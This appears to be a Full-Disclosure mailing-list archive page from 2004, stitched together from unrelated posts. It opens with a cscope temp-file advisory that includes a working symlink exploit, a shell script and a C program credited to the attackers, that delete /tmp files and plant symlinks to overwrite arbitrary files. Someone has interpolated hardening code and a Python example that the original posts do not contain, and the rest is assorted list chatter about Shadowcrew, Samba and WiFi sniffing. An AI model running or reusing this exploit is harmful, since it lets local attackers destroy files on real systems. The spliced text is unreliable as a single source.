Cscope is a developer's tool under the BSD license used to browse source code. Its Unix pedigree is impeccable: it was originally developed at Bell Labs back in the PDP-11's days. Cscope was a part of the official AT&T Unix distribution for many years and has been used to manage projects involving 20 million lines of code!

|=---[ - VULNERABILITY OVERVIEW `--|

First, the temporary directory (P_tmpdir=/tmp) is badly handled in every myfopen() internal call. As we all know, creation of predictable temporary files allows any local attacker to remove arbitrary files on the vulnerable file system via the infamous symlink vulnerability.

/src/main.c :
--------
    [...]
    char    temp1[PATHLEN + 1];    /* temporary file name */
    char    temp2[PATHLEN + 1];    /* temporary file name */
    [...]
    tmpdir = mygetenv("TMPDIR", TMPDIR);
    [...]
    /* create the temporary file names */
    pid = getpid();
    (void) sprintf(temp1, "%s/cscope%d.1", tmpdir, pid);
    (void) sprintf(temp2, "%s/cscope%d.2", tmpdir, pid);
    [...]
--------

Before us is the computing of two predictable file names (resulting in a schema like /tmp/cscopeNEXTPID.numba). So, we just have to probe the pid numba and make the same template which is to be used for temporary file creation. Then, cscope handles the files with the wrong set of flags and compromises the root filesystem due to the symlink vulnerability.
|=---[ - EXPLOITS - Proof of concept `--|

---8<---cut-here---8<---
#!/bin/sh
#
# RXcscope_proof.sh
# brute force case baby
# cscope advisory and exploit by Gangstuck / Psirac [EMAIL PROTECTED]
#
HOWM=30
CURR=`ps | grep ps | awk '{print $1}'`
NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1`
LAST=`expr $NEXT + $HOWM`

echo -e "\n--= Cscope Symlink Vulnerability Exploitation =--\n\
[versions 15.5 and minor]\n\
Gangstuck / Psirac\n\
[EMAIL PROTECTED]\n\n"

if [ $# -lt 1 ]; then
    echo "Usage: $0 file1 [number_of_guesses]"
    exit 1
fi

rm -f /tmp/cscope*
echo "Probed next process id [${NEXT}]"
while [ ! $NEXT -eq $LAST ]; do
    ln -s $1 /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1`
    ln -s $1 /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1`
done
---8<---cut-here---8<---

/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE 64

int main(int ac, char *av[])
{
    pid_t cur;
    u_int i = 0, lst;
    char buffer[BSIZE + 1];

    fprintf(stdout, "\n --[ Cscope Exploit ]--\n\
version 15.5 and minor \n \
Gangstuck / Psirac\n \
[EMAIL PROTECTED]\n\n");

    if (ac != 3) {
        fprintf(stderr, "Usage: %s target max file creation\n", av[0]);
        return 1;
    }
    cur = getpid();
    lst = cur + atoi(av[2]);
    fprintf(stdout, "- Current process id is . [%5d]\n \
- Last process id is [%5d]\n", cur, lst);
    /* alternate the .1 / .2 suffix while walking the probed pid range */
    while (++cur != lst) {
        snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur,
                 (i == 2) ? --i : ++i);
        symlink(av[1], buffer);
    }
    return 0;
}
---8<---cut-here---8<---

|=---[ - PATCH
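As an added example of the kind of fix the advisory's cut-off PATCH section would cover (this is not the advisory's patch nor cscope's code), here is the predictable-name pattern beside an mkstemp()-based replacement: the name is no longer derived from the pid, and the file is created with O_EXCL so a pre-planted symlink makes the call fail instead of being followed. PATHLEN and the cscope.XXXXXX template are assumed values.

```c
/* Added example, not the advisory's patch or cscope's code: replacing the
 * predictable "<tmpdir>/cscope<pid>.N" naming with mkstemp(). */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef P_tmpdir
#define P_tmpdir "/tmp"
#endif
#define PATHLEN 1024   /* assumed value; cscope's own constant is not quoted on the page */

struct tmpfile {
    int  fd;
    char path[PATHLEN + 1];
};

/* The advisory's pattern, kept only to show what can be precomputed: the
 * name depends solely on tmpdir and the pid. Nothing is opened here. */
int predictable_name(char *out, size_t outlen, const char *tmpdir, pid_t pid, int n)
{
    return snprintf(out, outlen, "%s/cscope%d.%d", tmpdir, (int)pid, n);
}

/* Same directory selection as the advisory's snippet: $TMPDIR, else P_tmpdir. */
const char *pick_tmpdir(void)
{
    const char *d = getenv("TMPDIR");
    return (d != NULL && *d != '\0') ? d : P_tmpdir;
}

/* Hardened replacement. Returns 0 and fills *t on success, -1 otherwise.
 * mkstemp() chooses an unpredictable suffix and opens with O_CREAT|O_EXCL
 * (mode 0600); the descriptor is then cross-checked against a fresh lstat()
 * of the path so that a later swap of the path for a symlink is caught too. */
int create_private_tmpfile(struct tmpfile *t, const char *tmpdir)
{
    struct stat by_fd, by_path;
    int n = snprintf(t->path, sizeof t->path, "%s/cscope.XXXXXX", tmpdir);

    t->fd = -1;
    if (n < 0 || (size_t)n >= sizeof t->path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    t->fd = mkstemp(t->path);
    if (t->fd < 0)
        return -1;
    if (fstat(t->fd, &by_fd) != 0 || lstat(t->path, &by_path) != 0 ||
        !S_ISREG(by_path.st_mode) ||
        by_fd.st_dev != by_path.st_dev || by_fd.st_ino != by_path.st_ino) {
        close(t->fd);
        unlink(t->path);
        t->fd = -1;
        return -1;
    }
    return 0;
}

void discard_tmpfile(struct tmpfile *t)
{
    if (t->fd >= 0) {
        close(t->fd);
        unlink(t->path);
        t->fd = -1;
    }
}

/* Demonstration: two files get distinct names inside tmpdir, the template
 * was filled in, and neither name is what the advisory's formula predicts
 * for this pid. Returns 1 if all of that holds, 0 otherwise. */
int demo(void)
{
    struct tmpfile a, b;
    char guess[PATHLEN + 1];
    const char *dir = pick_tmpdir();
    int ok = 0;

    if (create_private_tmpfile(&a, dir) != 0)
        return 0;
    if (create_private_tmpfile(&b, dir) == 0) {
        predictable_name(guess, sizeof guess, dir, getpid(), 1);
        ok = strcmp(a.path, b.path) != 0 &&
             strcmp(a.path, guess) != 0 &&
             strncmp(a.path, dir, strlen(dir)) == 0 &&
             strstr(a.path, "XXXXXX") == NULL;
        discard_tmpfile(&b);
    }
    discard_tmpfile(&a);
    return ok;
}

int main(void)
{
    printf("mkstemp-based temp files: %s\n", demo() ? "ok" : "FAILED");
    return 0;
}
```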
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Wed, 17 Nov 2004 10:21:01 -0800, josh abbott [EMAIL PROTECTED] wrote:
this stuff is totally real to the max. my cousin's former roommate's neighbor's uncle jessie once worked for the secret service and he told me it's completely standard protocol to have the mission impossible theme in the background. also the strike tag is used exclusively by the secret service.

The strike tag is used on Microsoft FrontPage editor, which the secret service used for shadowcrew.com, and every other Microsoft FrontPage user across the world will use the strike tag when using Microsoft FrontPage editor, so I don't know what you mean when you use the word "exclusively" used by secret services.

Thanks, n3td3v
http://www.geocities.com/n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004 11:41:20 -0600, Todd Towles [EMAIL PROTECTED] wrote:
Well, it is given that posting to FD does give a site exposure (good and bad). But I wouldn't say that FD was the cause of it.. it was the illegal activity that was the cause of it. We all know SCC does some underground stuff and they post here each time they move. So... I wouldn't blame the FD list for anything.

I wouldn't use the word blame? I think it's a good thing if Full-Disclosure is helping to catch online criminals. I don't know if you like malicious hackers and other criminals, but yeah I dislike them. I would do anything in my power to stop online crime, from scriptkiddie stuff, to sex stuff, spam, scams, fraud, terrorism and back again. I have no space for anyone thinking they are elite and all the other hacker scene crap. It's time to clamp down on the BS that's on the net. If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tolerance with online crime. Govs should have the authority to close anything down because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, it's time to get a tighter grip on things.

Thanks, n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Administrivia: Fool Disclosure
On Mon, 15 Nov 2004 13:46:37 CST, Frank Knobbe said:
Which leads to the question, which is a safe graphics file format? BMP perhaps?

Nope - the incredible compression of .BMP files allows its use to DoS the mail server. :)
Re: [Full-Disclosure] OT: U.S. 2004 Election Fraud.
On Mon, 15 Nov 2004 22:32:21 +0100, Florian Streck said:
Wasn't the reason for the Electors that at that time it was not practicable to make a direct election due to the great distances in America?

No, the concern was that people out in the boonies might be ignorant hicks who would vote for a bad choice because they didn't have much exposure to either candidate's viewpoints. So they added the Electoral College as a safety net (presuming that the actual electors would have more information about all the candidates...)

Now can we get back to *security* issues, like "Is a Diebold hackable by a chimpanzee?" :)

(Personally, I'm convinced that there *was* fraud on *both* sides, but not enough to actually *provably* sway the end result for President, so we need to move on and start thinking about how to make 2008 a *tough* election to hack - and *that* discussion *is* on topic here.. ;)
[Full-Disclosure] For your pleasure
Guys,

For your pleasure: http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php

I know, it is in French, but here is my translation; it deserves to be known.

Digging into Windows XP Operating Systems, the journalists of PC Welt discovered the following text at the end of the files present in the C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory:

[see the picture at the link]

You have to know that DeepzOne is the nickname of a founding member of the Radium cracking group created in 1997 and specialized in the cracking of sound oriented software. To say it another way, the Microsoft guy who created these files used a cracked version of the SoundForce program. Even if it is probable the Redmond giant has a license of this program (400$), it looks bad to see this when we are hearing everywhere about the Microsoft anti-piracy policy...

Laurent LEVIER
Systems & Networks Security Expert, CISSP CISM

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004 13:29:19 -0700 (MST), Bruce Ediger [EMAIL PROTECTED] wrote:
Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that "quaint" (I believe that's what our new Attorney General calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xml&sSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights.
"Zero tolerance." What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans.

I don't live in the U.S. thankfully, I live in a sane country called the U.K.

Would you agree with closing down a site that was letting child abusers post links to illegal child porn photographs? Would the site owner be able to say, "we aren't involved with any of these links, we just provide the site for the criminals to do it, so other child abusers can get links easy to child porn photos"? But no, when we move onto online malicious hacker crimes, it's OK for sites, such as zone-h, which allows malicious hackers to post links for other hackers to get a kick over, just like a child abuser would by visiting a child porn photo. Imagine a child abuse site which also kept a score board of the biggest amount of child porn photo posters. Yet again we move onto malicious hacker online crimes, it seems to be different for zone-h to keep scores of the biggest malicious hacker defacement posters.
Why one rule for one online crime promotion site and not the same rule for another online crime promotion site? I guess you would allow a child porn promotion site, like you think its ok for zone-h to be online promoting online malicious hacking and not closed down. Thanks,n3td3v http://www.geocities.com/n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Eudora 6.2 attachment spoof
On Mon, 29 Nov 2004 05:31:14 EST, KF_lists said:

> Professional responses like that *really* make me wanna go out and pay for Eudora.

OK. So make a difference. How much *more* are you willing to pay for Eudora to make security a higher priority?

Yes, we security geeks all have a vested interest in whether Qualcomm fixes the security holes *totally* - the white hats want them fixed, the black hats don't. But we mustn't lose sight of the fact that at the end of the month, Qualcomm probably doesn't manage to pay a *single* programmer's salary out of the income they get from selling "highly secure Eudora" - but they probably manage to pay several programmers if they can advertise "Now with *better* spam filtering!!"

As a result, spam filtering that impacts 95% of the user base gets more programmer time/eyeballs than fixing some truly convoluted corner case in the MIME handling that maybe gets used on 0.01% of the users, if that many.

Remember - software-for-money is a *business*, and decisions about priorities will almost always be made based on the *business model*, not some moral imperative, because you pay your expenses with sales income, not moral imperatives.
RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
I have no problem with this list. I use a tool to passively filter this list, the same that I do for the spam problem that has taken over planet earth. In your email client there is a button that will take care of this for you. Look for something in the respects of "DELETE". Anyone who can not decipher what is good and what is bad should be unsubscribed instead.

Mike

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Esler, Joel - Contractor
Sent: Wednesday, November 17, 2004 9:06 AM
To: Jason; Eric Scher
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.

In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off.

J

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Jason
Sent: Tuesday, November 16, 2004 10:20 PM
To: Eric Scher
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.

tell him directly Gregh [EMAIL PROTECTED]

Eric Scher wrote:
> [...]
> No point in sticking around to watch this ship finish sinking.
Re: [Full-Disclosure] question regarding CAN-2004-0930
--On Wednesday, November 17, 2004 12:13:52 AM +0100 Christian [EMAIL PROTECTED] wrote:

> hm, I still don't get it: the daemon has to answer to dir too, doesn't he? the sole reason that ls is a unix utility does not make sense in this context. ls and dir are not vulnerable here, sure, but this still does not explain why smbd acts different here. I've played around with tcpdump and strace here. the tcpdump looks very similar, the smbd's answer to ls is much shorter, as strace reveals.

I've obviously done a poor job of explaining the problem then. When you do a dir, you are making a call that the daemon has to respond to. The daemon is vulnerable, so when you make a dir request with the specific parameters that overflow the buffer in the daemon, it crashes. When you do an ls, you are making a call that the *os* has to respond to. The os is *not* vulnerable, so it (properly) rejects the request as malformed.

Hopefully that makes more sense to you.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
RE: [Full-Disclosure] WiFi question
If you want to do Kismet, get a Sharp Zaurus handheld and install OpenZaurus. Been running Dsniff, Kismet and Nmap on my handheld.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Dave King
Sent: Wednesday, November 17, 2004 10:52 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] WiFi question

As far as handheld devices to aid you in your quest go, there are several options. If you've got a Pocket PC around you can try ministumbler, which is basically the Pocket PC version of netstumbler. It's free and would probably do most of what you want. If you want more and you're willing to fork out some cash (I believe it's around $3000), AirMagnet can do some really cool stuff but it's probably overkill for you. If you're feeling brave and can get hold of an iPaq, you can replace Windows with Familiar Linux (www.handhelds.org) and then install Kismet (www.kismetwireless.net), which is a great free WiFi detecting/sniffing utility. Kismet can even work with a GPS receiver and triangulate the location of the access point (although GPS systems don't tend to work well in buildings). This option is what I use, since I could run it on an iPaq I picked up off eBay cheap and it has all the features I need, plus it's free.

Laters,
Dave King
http://www.thesecure.net

[EMAIL PROTECTED] wrote:

> List,
>
> I'm an expert in nothing, so when I saw this I had to ask, as I'm sure there's someone out there that is a WiFi expert. Google has found no answer so here goes.
>
> Last night we saw a new access point appear. No problems, it's an ad-hoc network so it's someone's machine with XP on, configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4th. Then the first two drop off; this repeats forever. Always using a different MAC address when a new AP appears.
>
> The APs are all WEP enabled (which I can't crack cos I don't have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers), so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell it's coming from this office (the IT dept), basing that assumption on signal strength.
>
> Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!)
>
> Answers on a post card :)
>
> Colin.
>
> **********
> This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom.
> **********
Re: [Full-Disclosure] question regarding CAN-2004-0930
On Wed, 17 Nov 2004 17:49:12 -0600, Paul Schmehl wrote:

> When you do an ls, you are making a call that the *os* has to respond to. The os is *not* vulnerable, so it (properly) rejects the request as malformed.

I think I get it now. As someone else explained, wildcard expansion is also an issue here, so the (Linux) OS responds before the smbd could even notice the call.

> Hopefully that makes more sense to you.

Yes, thank you.

Christian.

--
BOFH excuse #433: error: one bad user found in front of screen
[Full-Disclosure] Re: New whitepaper: Writing IA32 Restricted Instruction Set Shellcode Decoder Loops
Hey, cool paper. Speaking of phrack, if in the future you have an article you think is print-worthy but is rejected by most zines, try sending it to Binary Revolution [EMAIL PROTECTED]. Although they're newer and have had some delays in getting new issues out, they're starting to re-focus on the magazine and the number of their supporters is growing. Sorry if this comes off a little advertisey, but hopefully if more people write in then BinRev can publish more original articles about vulnerabilities which can then make it back onto the web as sample articles.

Berend-Jan Wever wrote:

> Hi all,
>
> This one got rejected by phrack and I couldn't be arsed to rewrite it so it would make the next edition:
>
> "Writing IA32 Restricted Instruction Set Shellcode Decoder Loops" by SkyLined
> ( http://www.edup.tudelft.nl/~bjwever/whitepaper_shellcode.html )
>
> The article addresses the requirements for writing a shellcode decoder loop using a limited number of characters that limits our instruction set. Most of it is based on my experience with alphanumeric decoders but the principles apply to any piece of code that is written to work with a limited instruction set. (It's a continuation on rix's and obscou's work for phrack).
>
> Comments and questions welcome, but I can not guarantee an answer to n00b questions.
>
> Cheers,
> SkyLined
> http://www.edup.tudelft.nl/~bjwever
> [EMAIL PROTECTED]
RE: [Full-Disclosure] IE is just as safe as FireFox
So are you saying you truly believe IE to be an integral part of the OS, that without it the OS would not be usable or would fail entirely, and believe MS implicitly, or are you just trying to be a sassy PITA?

--
Pro-Choice: Let me choose if I even want a browser loaded, thanks!

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Gary E. Miller
Sent: Tuesday, November 16, 2004 2:09 PM
To: Todd Towles
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox

I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal position.
RE: [Full-Disclosure] IE is just as safe as FireFox
I would rather not get too deep into this. But I think you are mixing the ideas of good code with good documentation, or possibly with good hard design specs. In any project there are going to be things that aren't specifically specified in the design that some other module could possibly take advantage of. These are generally considered implementation details.

For a basic example, say you have a routine that takes a search filter and returns information based on that filter. Let's say when the spec was written, no thought of the ordering of the data to be returned was defined; it was simply a matter of "return the correct data". Actually specifying the order possibly wasn't important or was overlooked. Some very high quality code was written to the spec, and the specific implementation detail ended up having it so the data got returned in a way that was sorted by some field used in the query or by some arbitrary value specific to the indexing. Someone completely unrelated to the module, say someone who is using that module as an API or as a server app, notices that it always comes back sorted and implements some stateless retrieval mechanism around it (I understand, this is their F-U and they wrote bad code here because there are critical untested assumptions). This works for years and years. Then some work is done on the original code and that implementation detail changes, and sort is now done in a different way or not at all. Downstream modules dependent on that until-then well understood implementation detail implode. The original code was still high quality. Someone just used it in a way that wasn't intended. It is these unintended uses of implementation details that can really bite you, and why YOU ALWAYS legacy test code that may be used by something else.

I don't think any spec will ever define out 100% what needs to go in and what needs to come out and all of the possible implementation details that could result. I think we can get close and assert the crap out of the input and output based on what we expect and break out when it deviates. But this is an expensive form of coding and I think impacts flexibility a little.

Anyway, on the flip side you could have horrible spaghetti code that conforms very well to a published spec as well. I would tend to agree that normally that would be harder to work on (except for maybe the person who originally wrote it) but want to put emphasis on the importance truly being in the spec and data assertions.

I completely agree that IE is too intertwined and it gives the appearance that the OS needs it. It does need to be stripped back out, or the piece that allegedly has to be there for OS functionality needs to be stripped down to very bare, very basic pieces that disallow any extension or code execution.

joe

--
Pro-Choice: Let me choose if I even want a browser loaded, thanks!

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Eric Paynter
Sent: Tuesday, November 16, 2004 4:19 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox

But high quality code that has a sound and well documented architecture can be more easily updated without messing up dependencies, whereas low quality code can be a nightmare to find let alone correct even the most trivial bug. There are always exceptions, but *in general*, it is easier (less effort, faster turnaround) to maintain high quality code.

-Eric
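The "sorted by accident" scenario above, as an added example that is not code from anyone in this thread: a search routine whose output order was never part of the spec, a stateless pager that quietly depends on it and breaks when the implementation is swapped, and a contract wrapper that makes the order explicit and asserts on input and output. All records, names and the two search implementations are constructed for illustration.

```python
"""Constructed example: an unspecified result order consumed as if it were a promise."""
from typing import List, Sequence, Tuple

Record = Tuple[int, str, str]  # (id, vendor, severity); constructed schema

# Constructed sample data.
RECORDS: List[Record] = [
    (1, "acme", "high"), (2, "acme", "low"), (3, "bolt", "high"),
    (4, "acme", "medium"), (5, "bolt", "low"), (6, "acme", "high"),
]


def search_v1(records: Sequence[Record], vendor: str) -> List[Record]:
    """First implementation: a linear scan. Matching rows happen to come back in
    insertion order, but the spec only ever said 'return the rows that match'."""
    return [r for r in records if r[1] == vendor]


def search_v2(records: Sequence[Record], vendor: str) -> List[Record]:
    """Later rewrite built on a severity index. It still returns exactly the right
    rows, but the incidental order is now grouped by severity: the detail changed."""
    index = {}
    for r in records:
        if r[1] == vendor:
            index.setdefault(r[2], []).append(r)
    out: List[Record] = []
    for sev in sorted(index):
        out.extend(index[sev])
    return out


def paginate_across_upgrade(impls, records, vendor, page_size):
    """Downstream consumer: stateless offset paging that re-runs the search for
    every page. impls[n] is whichever implementation is deployed when page n is
    requested, so [search_v1, search_v2] models an upgrade landing between two
    page requests. Returns the ids the consumer ends up seeing."""
    seen = []
    for page_no, impl in enumerate(impls):
        rows = impl(records, vendor)
        seen.extend(r[0] for r in rows[page_no * page_size:(page_no + 1) * page_size])
    return seen


def audit(seen, records, vendor):
    """Which matching ids the consumer never saw, and which it saw more than once."""
    expected = {r[0] for r in records if r[1] == vendor}
    missing = sorted(expected - set(seen))
    duplicated = sorted({i for i in seen if seen.count(i) > 1})
    return missing, duplicated


def with_contract(impl):
    """Promote the ordering from implementation detail to contract and assert on
    input and output: the filter is sane, every row matches it, no row is missing,
    and rows come back in ascending id order. Any implementation wrapped this way
    keeps the same promise, so the pager above survives the upgrade."""
    def checked(records, vendor):
        assert vendor, "vendor filter must be non-empty"
        rows = sorted(impl(records, vendor), key=lambda r: r[0])
        assert all(r[1] == vendor for r in rows), "row does not match filter"
        assert len(rows) == sum(1 for r in records if r[1] == vendor), "rows missing"
        return rows
    return checked


if __name__ == "__main__":
    broken = paginate_across_upgrade([search_v1, search_v2], RECORDS, "acme", 2)
    print("unchecked:", broken, audit(broken, RECORDS, "acme"))
    fixed = paginate_across_upgrade(
        [with_contract(search_v1), with_contract(search_v2)], RECORDS, "acme", 2)
    print("contract:", fixed, audit(fixed, RECORDS, "acme"))
```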
Re: [Full-Disclosure] Airport x-ray software creating images of phantom weapons?
On Tue, 16 Nov 2004 05:08:48 GMT, Jason Coombs said:

> If quality is the true objective, then perhaps we should adopt exceptions to intellectual property laws to force into the public domain any creative work that has the capability to impact the security of anything important...

A few minutes of careful thought and pondering over what security measures have been deployed and proposed will reveal the following:

1) Invisible effective measures don't do much good, because they don't sway votes.

2) Highly visible measures, even if ineffective, do good because they allow the projection of a "We're doing something about it" spin.

Now, why do you think quality counts as an objective here? (Consider in your discussion the chances that the Department of Homeland Security will *ever* lower the Threat Level to 'green', and under what conditions that would happen, and what that would mean for the continued employment of the people responsible for lowering it to green.)
RE: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
Well, as a security professional I can testify that the sites you want closed down, i.e. reference to zone-h etc., are a valued source of knowledge! Obviously you're not plugged into security and as such use these groups to talk shi* and justify your views of closing IRC channels. Thankfully you're not in government and btw, not all readers on this list are in the US. I am from the UK and it's clear to me that you don't understand the concept of freedom of information!

r

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Bruce Ediger
Sent: 17 November 2004 20:29
To: [EMAIL PROTECTED]
Subject: Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment

On Wed, 17 Nov 2004, n3td3v wrote:

> ...
> If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tolerance with online crime. Govs should have the authority to close anything down because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, it's time to get a tighter grip on things.
> ...
> Same for zone-h.org, close the crap down.. f**k anything that looks remotely hax0rish.

Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that "quaint" (I believe that's what our new Attorney General calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xml&sSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights.

Zero tolerance. What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans.
RE: [Full-Disclosure] IE is just as safe as FireFox
Ah thanks, that answers my question. :o)

On the MS defender comment: well, I can't say much other than not everyone thinks that a company is entirely good or entirely bad. I have a more granular outlook on things. Some things are done well, some things aren't. That applies to all OSes. None of them do everything right.

joe

--
Pro-Choice: Let me choose if I even want a browser loaded, thanks!

-----Original Message-----
From: Gary E. Miller [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, November 17, 2004 5:24 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox

Yo Jo!

Who am I to tell Bill Gates he is a liar and a perjurer? He and his employees, under oath, said IE is an indivisible part of the OS. So it must be so. :-)

I do not have an opinion since I gave up WinBlows years ago. Just seemed odd to me that an M$ defender would not be going with the party line and suggesting the IE is not part of the OS. Sorta thought that was obvious from the context which you deleted, but some people are clueless and can not be helped.

RGDS
GARY
---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED] Tel:+1(541)382-8588 Fax: +1(541)382-8676

On Wed, 17 Nov 2004, joe wrote:

> So are you saying you truly believe IE to be an integral part of the OS, that without it the OS would not be usable or would fail entirely, and believe MS implicitly, or are you just trying to be a sassy PITA?
>
> --
> Pro-Choice: Let me choose if I even want a browser loaded, thanks!
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Gary E. Miller
> Sent: Tuesday, November 16, 2004 2:09 PM
> To: Todd Towles
> Cc: [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] IE is just as safe as FireFox
>
> I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal position.
[Full-Disclosure] Re: controversial shadowcrew site hacked by secret service?
Hello list,

Mission Impossible theme sounded weird (too weird) and so on... Tell me: why should these links be active after the UNITED STATES SECRET SERVICE operation?

http://www.shadowcrew.com/phpBB2/login.php
http://archive.shadowcrew.com/Archive/

Matteo Giannone
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
Without web defacing teenagers this industry wouldn't have gained the momentum it has. Yin/Yang. Without your so-called cybercriminals your life would be meaningless.

/m

Len Rose is a muppet. Stop moderating my mail.

----- Original Message -----
From: n3td3v [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, November 17, 2004 3:19 PM
Subject: Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment

> On Wed, 17 Nov 2004 13:29:19 -0700 (MST), Bruce Ediger [EMAIL PROTECTED] wrote:
>
>> Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that "quaint" (I believe that's what our new Attorney General calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xml&sSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights.
>>
>> Zero tolerance. What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans.
>
> I don't live in the U.S., thankfully; I live in a sane country called the U.K.
>
> Would you agree with closing down a site that was letting child abusers post links to illegal child porn photographs? Would the site owner be able to say, "we aren't involved with any of these links, we just provide the site for the criminals to do it, so other child abusers can get links easily to child porn photos"?
>
